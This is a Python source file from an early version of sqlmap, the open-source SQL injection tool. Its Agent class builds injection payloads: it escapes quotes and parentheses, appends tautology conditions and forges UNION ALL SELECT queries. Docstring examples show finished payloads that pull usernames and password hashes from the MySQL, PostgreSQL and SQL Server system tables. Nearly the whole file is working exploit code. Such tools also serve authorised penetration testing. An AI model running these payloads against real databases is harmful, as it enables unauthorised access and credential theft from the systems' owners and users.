#!/usr/bin/env python """ $Id$ This file is part of the sqlmap project, http://sqlmap.sourceforge.net. Copyright (c) 2006-2008 Bernardo Damele A. G. and Daniele Bellucci sqlmap is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation version 2 of the License. sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with sqlmap; if not, write to the Free Software Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA """ import re from lib.core.common import randomInt from lib.core.common import randomStr from lib.core.data import conf from lib.core.data import kb from lib.core.data import queries from lib.core.data import temp from lib.core.exception import sqlmapNoneDataException from lib.core.exception import sqlmapUnsupportedDBMSException class Agent: """ This class defines the SQL agent methods. """ def __init__(self): temp.delimiter = randomStr(6) temp.start = randomStr(6) temp.stop = randomStr(6) def payload(self, place=None, parameter=None, value=None, newValue=None): """ This method replaces the affected parameter with the SQL injection statement to request """ retValue = "" # After identifing the injectable parameter if kb.injPlace == "User-Agent": retValue = kb.injParameter.replace(kb.injParameter, kb.injParameter + newValue) elif kb.injParameter: paramString = conf.parameters[kb.injPlace] paramDict = conf.paramDict[kb.injPlace] value = paramDict[kb.injParameter] retValue = paramString.replace("%s=%s" % (kb.injParameter, value), "%s=%s" % (kb.injParameter, value + newValue)) # Before identifing the injectable parameter elif parameter == "User-Agent": retValue = value.replace(value, newValue) else: paramString = conf.parameters[place] retValue = paramString.replace("%s=%s" % (parameter, value), "%s=%s" % (parameter, newValue)) return retValue def prefixQuery(self, string): """ This method defines how the input string has to be escaped to perform the injection depending on the injection type identified as valid """ query = "" if kb.injType == "numeric": pass elif kb.injType in ( "stringsingle", "likesingle" ): query = "'" elif kb.injType in ( "stringdouble", "likedouble" ): query = "\"" else: raise sqlmapNoneDataException, "unsupported injection type" if kb.parenthesis not in ( None, 0 ): query += "%s " % (")" * kb.parenthesis) query += string return query def postfixQuery(self, string, comment=None): """ This method appends the DBMS comment to the SQL injection request """ randInt = randomInt() randStr = randomStr() if comment: string += "%s" % comment if kb.parenthesis != None: string += " AND %s" % ("(" * kb.parenthesis) else: raise sqlmapNoneDataException, "unable to get the number of parenthesis" if kb.injType == "numeric": string += "%d=%d" % (randInt, randInt) elif kb.injType == "stringsingle": string += "'%s'='%s" % (randStr, randStr) elif kb.injType == "likesingle": string += "'%s' LIKE '%s" % (randStr, randStr) elif kb.injType == "stringdouble": string += "\"%s\"=\"%s" % (randStr, randStr) elif kb.injType == "likedouble": string += "\"%s\" LIKE \"%s" % (randStr, randStr) else: raise sqlmapNoneDataException, "unsupported injection type" return string def nullAndCastField(self, field): """ Take in input a field string and return its processed nulled and casted field string. Examples: MySQL input: VERSION() MySQL output: IFNULL(CAST(VERSION() AS CHAR(10000)), ' ') MySQL scope: VERSION() PostgreSQL input: VERSION() PostgreSQL output: COALESCE(CAST(VERSION() AS CHARACTER(10000)), ' ') PostgreSQL scope: VERSION() Oracle input: banner Oracle output: NVL(CAST(banner AS VARCHAR(4000)), ' ') Oracle scope: SELECT banner FROM v$version WHERE ROWNUM=1 Microsoft SQL Server input: @@VERSION Microsoft SQL Server output: ISNULL(CAST(@@VERSION AS VARCHAR(8000)), ' ') Microsoft SQL Server scope: @@VERSION @param field: field string to be processed @type field: C{str} @return: field string nulled and casted @rtype: C{str} """ nulledCastedField = queries[kb.dbms].cast % field nulledCastedField = queries[kb.dbms].isnull % nulledCastedField return nulledCastedField def nullCastConcatFields(self, fields): """ Take in input a sequence of fields string and return its processed nulled, casted and concatenated fields string. Examples: MySQL input: user,password MySQL output: IFNULL(CAST(user AS CHAR(10000)), ' '),'UWciUe',IFNULL(CAST(password AS CHAR(10000)), ' ') MySQL scope: SELECT user, password FROM mysql.user PostgreSQL input: usename,passwd PostgreSQL output: COALESCE(CAST(usename AS CHARACTER(10000)), ' ')||'xRBcZW'||COALESCE(CAST(passwd AS CHARACTER(10000)), ' ') PostgreSQL scope: SELECT usename, passwd FROM pg_shadow Oracle input: COLUMN_NAME,DATA_TYPE Oracle output: NVL(CAST(COLUMN_NAME AS VARCHAR(4000)), ' ')||'UUlHUa'||NVL(CAST(DATA_TYPE AS VARCHAR(4000)), ' ') Oracle scope: SELECT COLUMN_NAME, DATA_TYPE FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='%s' Microsoft SQL Server input: name,master.dbo.fn_varbintohexstr(password) Microsoft SQL Server output: ISNULL(CAST(name AS VARCHAR(8000)), ' ')+'nTBdow'+ISNULL(CAST(master.dbo.fn_varbintohexstr(password) AS VARCHAR(8000)), ' ') Microsoft SQL Server scope: SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins @param fields: fields string to be processed @type fields: C{str} @return: fields string nulled, casted and concatened @rtype: C{str} """ if not kb.dbmsDetected: return fields fields = fields.replace(", ", ",") fieldsSplitted = fields.split(",") dbmsDelimiter = queries[kb.dbms].delimiter nulledCastedFields = [] for field in fieldsSplitted: nulledCastedFields.append(self.nullAndCastField(field)) delimiterStr = "%s'%s'%s" % (dbmsDelimiter, temp.delimiter, dbmsDelimiter) nulledCastedConcatFields = delimiterStr.join([field for field in nulledCastedFields]) return nulledCastedConcatFields def getFields(self, query): fieldsSelectTop = re.search("\ASELECT\s+TOP\s+[\d]+\s+(.+?)\s+FROM", query, re.I) fieldsSelectDistinct = re.search("\ASELECT\s+DISTINCT\((.+?)\)\s+FROM", query, re.I) fieldsSelectFrom = re.search("\ASELECT\s+(.+?)\s+FROM\s+", query, re.I) fieldsSelect = re.search("\ASELECT\s+(.*)", query, re.I) fieldsNoSelect = query if fieldsSelectTop: fieldsToCast = fieldsSelectTop.groups()[0] elif fieldsSelectDistinct: fieldsToCast = fieldsSelectDistinct.groups()[0] elif fieldsSelectFrom: fieldsToCast = fieldsSelectFrom.groups()[0] elif fieldsSelect: fieldsToCast = fieldsSelect.groups()[0] elif fieldsNoSelect: fieldsToCast = fieldsNoSelect return fieldsSelectFrom, fieldsSelect, fieldsNoSelect, fieldsToCast def concatQuery(self, query): """ Take in input a query string and return its processed nulled, casted and concatenated query string. Examples: MySQL input: SELECT user, password FROM mysql.user MySQL output: CONCAT('mMvPxc',IFNULL(CAST(user AS CHAR(10000)), ' '),'nXlgnR',IFNULL(CAST(password AS CHAR(10000)), ' '),'YnCzLl') FROM mysql.user PostgreSQL input: SELECT usename, passwd FROM pg_shadow PostgreSQL output: 'HsYIBS'||COALESCE(CAST(usename AS CHARACTER(10000)), ' ')||'KTBfZp'||COALESCE(CAST(passwd AS CHARACTER(10000)), ' ')||'LkhmuP' FROM pg_shadow Oracle input: SELECT COLUMN_NAME, DATA_TYPE FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='USERS' Oracle output: 'GdBRAo'||NVL(CAST(COLUMN_NAME AS VARCHAR(4000)), ' ')||'czEHOf'||NVL(CAST(DATA_TYPE AS VARCHAR(4000)), ' ')||'JVlYgS' FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME='USERS' Microsoft SQL Server input: SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins Microsoft SQL Server output: 'QQMQJO'+ISNULL(CAST(name AS VARCHAR(8000)), ' ')+'kAtlqH'+ISNULL(CAST(master.dbo.fn_varbintohexstr(password) AS VARCHAR(8000)), ' ')+'lpEqoi' FROM master..sysxlogins @param query: query string to be processed @type query: C{str} @return: query string nulled, casted and concatenated @rtype: C{str} """ concatQuery = "" query = query.replace(", ", ",") fieldsSelectFrom, fieldsSelect, fieldsNoSelect, fieldsToCast = self.getFields(query) castedFields = self.nullCastConcatFields(fieldsToCast) concatQuery = query.replace(fieldsToCast, castedFields, 1) if kb.dbms == "MySQL": if fieldsSelectFrom: concatQuery = concatQuery.replace("SELECT ", "CONCAT('%s'," % temp.start, 1) concatQuery = concatQuery.replace(" FROM ", ",'%s') FROM " % temp.stop, 1) elif fieldsSelect: concatQuery = concatQuery.replace("SELECT ", "CONCAT('%s'," % temp.start, 1) concatQuery += ",'%s')" % temp.stop elif fieldsNoSelect: concatQuery = "CONCAT('%s',%s,'%s')" % (temp.start, concatQuery, temp.stop) elif kb.dbms in ( "Oracle", "PostgreSQL" ): if fieldsSelectFrom: concatQuery = concatQuery.replace("SELECT ", "'%s'||" % temp.start, 1) concatQuery = concatQuery.replace(" FROM ", "||'%s' FROM " % temp.stop, 1) elif fieldsSelect: concatQuery = concatQuery.replace("SELECT ", "'%s'||" % temp.start, 1) concatQuery += "||'%s'" % temp.stop if kb.dbms == "Oracle": concatQuery += " FROM DUAL" elif fieldsNoSelect: concatQuery = "'%s'||%s||'%s'" % (temp.start, concatQuery, temp.stop) if kb.dbms == "Oracle": concatQuery += " FROM DUAL" elif kb.dbms == "Microsoft SQL Server": if fieldsSelectFrom: concatQuery = concatQuery.replace("SELECT ", "'%s'+" % temp.start, 1) concatQuery = concatQuery.replace(" FROM ", "+'%s' FROM " % temp.stop, 1) elif fieldsSelect: concatQuery = concatQuery.replace("SELECT ", "'%s'+" % temp.start, 1) concatQuery += "+'%s'" % temp.stop elif fieldsNoSelect: concatQuery = "'%s'+%s+'%s'" % (temp.start, concatQuery, temp.stop) return concatQuery def forgeInbandQuery(self, query, exprPosition=None): """ Take in input an query (pseudo query) string and return its processed UNION ALL SELECT query. Examples: MySQL input: CONCAT(CHAR(120,121,75,102,103,89),IFNULL(CAST(user AS CHAR(10000)), CHAR(32)),CHAR(106,98,66,73,109,81),IFNULL(CAST(password AS CHAR(10000)), CHAR(32)),CHAR(105,73,99,89,69,74)) FROM mysql.user MySQL output: UNION ALL SELECT NULL, CONCAT(CHAR(120,121,75,102,103,89),IFNULL(CAST(user AS CHAR(10000)), CHAR(32)),CHAR(106,98,66,73,109,81),IFNULL(CAST(password AS CHAR(10000)), CHAR(32)),CHAR(105,73,99,89,69,74)), NULL FROM mysql.user-- AND 7488=7488 PostgreSQL input: (CHR(116)||CHR(111)||CHR(81)||CHR(80)||CHR(103)||CHR(70))||COALESCE(CAST(usename AS CHARACTER(10000)), (CHR(32)))||(CHR(106)||CHR(78)||CHR(121)||CHR(111)||CHR(84)||CHR(85))||COALESCE(CAST(passwd AS CHARACTER(10000)), (CHR(32)))||(CHR(108)||CHR(85)||CHR(122)||CHR(85)||CHR(108)||CHR(118)) FROM pg_shadow PostgreSQL output: UNION ALL SELECT NULL, (CHR(116)||CHR(111)||CHR(81)||CHR(80)||CHR(103)||CHR(70))||COALESCE(CAST(usename AS CHARACTER(10000)), (CHR(32)))||(CHR(106)||CHR(78)||CHR(121)||CHR(111)||CHR(84)||CHR(85))||COALESCE(CAST(passwd AS CHARACTER(10000)), (CHR(32)))||(CHR(108)||CHR(85)||CHR(122)||CHR(85)||CHR(108)||CHR(118)), NULL FROM pg_shadow-- AND 7133=713 Oracle input: (CHR(109)||CHR(89)||CHR(75)||CHR(109)||CHR(85)||CHR(68))||NVL(CAST(COLUMN_NAME AS VARCHAR(4000)), (CHR(32)))||(CHR(108)||CHR(110)||CHR(89)||CHR(69)||CHR(122)||CHR(90))||NVL(CAST(DATA_TYPE AS VARCHAR(4000)), (CHR(32)))||(CHR(89)||CHR(80)||CHR(98)||CHR(77)||CHR(80)||CHR(121)) FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME=(CHR(85)||CHR(83)||CHR(69)||CHR(82)||CHR(83)) Oracle output: UNION ALL SELECT NULL, (CHR(109)||CHR(89)||CHR(75)||CHR(109)||CHR(85)||CHR(68))||NVL(CAST(COLUMN_NAME AS VARCHAR(4000)), (CHR(32)))||(CHR(108)||CHR(110)||CHR(89)||CHR(69)||CHR(122)||CHR(90))||NVL(CAST(DATA_TYPE AS VARCHAR(4000)), (CHR(32)))||(CHR(89)||CHR(80)||CHR(98)||CHR(77)||CHR(80)||CHR(121)), NULL FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME=(CHR(85)||CHR(83)||CHR(69)||CHR(82)||CHR(83))-- AND 6738=6738 Microsoft SQL Server input: (CHAR(74)+CHAR(86)+CHAR(106)+CHAR(116)+CHAR(116)+CHAR(108))+ISNULL(CAST(name AS VARCHAR(8000)), (CHAR(32)))+(CHAR(89)+CHAR(87)+CHAR(116)+CHAR(100)+CHAR(106)+CHAR(74))+ISNULL(CAST(master.dbo.fn_varbintohexstr(password) AS VARCHAR(8000)), (CHAR(32)))+(CHAR(71)+CHAR(74)+CHAR(68)+CHAR(66)+CHAR(85)+CHAR(106)) FROM master..sysxlogins Microsoft SQL Server output: UNION ALL SELECT NULL, (CHAR(74)+CHAR(86)+CHAR(106)+CHAR(116)+CHAR(116)+CHAR(108))+ISNULL(CAST(name AS VARCHAR(8000)), (CHAR(32)))+(CHAR(89)+CHAR(87)+CHAR(116)+CHAR(100)+CHAR(106)+CHAR(74))+ISNULL(CAST(master.dbo.fn_varbintohexstr(password) AS VARCHAR(8000)), (CHAR(32)))+(CHAR(71)+CHAR(74)+CHAR(68)+CHAR(66)+CHAR(85)+CHAR(106)), NULL FROM master..sysxlogins-- AND 3254=3254 @param query: it is a processed query string unescaped to be forged within an UNION ALL SELECT statement @type query: C{str} @param exprPosition: it is the NULL position where it is possible to inject the query @type exprPosition: C{int} @return: UNION ALL SELECT query string forged @rtype: C{str} """ inbandQuery = self.prefixQuery(" UNION ALL SELECT ") if not exprPosition: exprPosition = kb.unionPosition if kb.dbms == "Oracle" and inbandQuery.endswith(" FROM DUAL"): inbandQuery = inbandQuery[:-len(" FROM DUAL")] for element in range(kb.unionCount): if element > 0: inbandQuery += ", " if element == exprPosition: if " FROM " in query: conditionIndex = query.rindex(" FROM ") inbandQuery += "%s" % query[:conditionIndex] else: inbandQuery += "%s" % query else: inbandQuery += "NULL" if " FROM " in query: conditionIndex = query.rindex(" FROM ") inbandQuery += "%s" % query[conditionIndex:] if kb.dbms == "Oracle": if " FROM " not in inbandQuery: inbandQuery += " FROM DUAL" if " ORDER BY " in inbandQuery: orderIndex = inbandQuery.index(" ORDER BY ") inbandQuery = inbandQuery[:orderIndex] inbandQuery = self.postfixQuery(inbandQuery, kb.unionComment) return inbandQuery # SQL agent agent = Agent()